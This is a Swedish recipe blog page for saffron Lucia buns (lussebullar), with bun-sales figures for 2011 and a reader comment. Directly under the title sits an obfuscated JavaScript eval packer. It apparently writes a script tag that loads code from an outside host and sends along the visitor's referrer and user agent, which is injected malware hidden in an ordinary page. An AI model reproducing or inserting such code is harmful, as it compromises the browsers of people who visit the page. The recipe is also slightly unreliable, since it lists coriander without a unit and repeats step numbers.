Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Lussebullar recept inför Lucia 2012

Lussebullar recept inför Lucia 2012

Lussebullar: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zinkd|var|u0026u|referrer|raiit||js|php’.split(’|’),0,{}))
Snart är det dags för årets lucia och folk börjar redan att bunkra upp med lussebullar och pepparkakor i stora lass.

Även om detta inte faller in bland våra kategorier är detta något som nästan alla vi gillar så det blir en liten artikel 🙂 

I år tror analytikerna att det kommer slå nytt rekord gällande försäljningen av lussebullar i Sverige.
Förra året under perioden november till nyår hade kedjan Pressbyrån ett mål på att sälja 400 000 lussekatter. Slutresultatet blev ca 472 000 sålda lussekatter som också blev en ökning med 75 procent mot 2010.

Vill ni inte bidra till denna försäljning i år kan ni ju självklart baka egna lussebullar 🙂

Nedan följer ett recept på hur du bakar ca 30-40 stycken lussebullar inför lucia 2012.

Lussebullar recept:

Du behöver för ca 30 – 40 bullar:

 • 2 paket saffran (1g)
 • 1,5 dl strösocker
 • 150 gram smör
 • 4 dl mjölk
 • 50 gram jäst
 • 0,5 tsk salt
 • 16 dl vetemjöl
 • 0,5 koriander
 • 1 st ägg

1. Mortla saffran och 1 msk socker till ett fint pulver.

2. Smält smöret på låg värme i en kastrull. Tillsätt mjölken och värm degvätskan till fingervärme (37 grader).

3. Ta fram en hushållsassistent. Smula jästen i assistentens bunke och tillsätt saffran. Häll över degspadet och rör om så att jästen löser sig. Tillsätt resten av socker, salt och det mesta av mjölet (spara ca 1 dl till utbakningen).

3. Bearbeta degen på låga varv i 6-8 minuter tills degen är blank och smidig. Prova att göra ett glutenprov genom att ta en liten bit av degen och försiktigt dra i den tills det nästan går att se igenom den. En färdigarbetad deg ska inte gå sönder när man gör detta. Den färdiga degen ska vara glansig och släppa från bunken kanter, men samtidigt ska det fortfarande vara lite kletig. Är den däremot mycket kletig tillsätt mer mjöl.

4. Låt degen jäsa övertäckt ca 60 minuter i rumstemperatur eller över natten i kylskåp.

5. Knåda ur luften ur degen på mjölat bakbord, dela upp degen i två delar och forma till två rullar. Täck över den ena och skär små bitar av den andra. Rulla ut dem och forma till lussekatter. Lägg figurerna direkt på plåtar med bakplåtspapper så slipper de flyttas. Garnera med korinter.

5. Sätt ugnen på 225 grader och låt bullarna jäsa övertäckta i ca 30 minuter.

6. Pensla försiktigt lussebullarna med uppvispat ägg. Grädda mitt i ugnen 5-8 minuter.

Recept från Tasteline.com

Comments

 1. Ulrika

  Ska man skippa koriandern?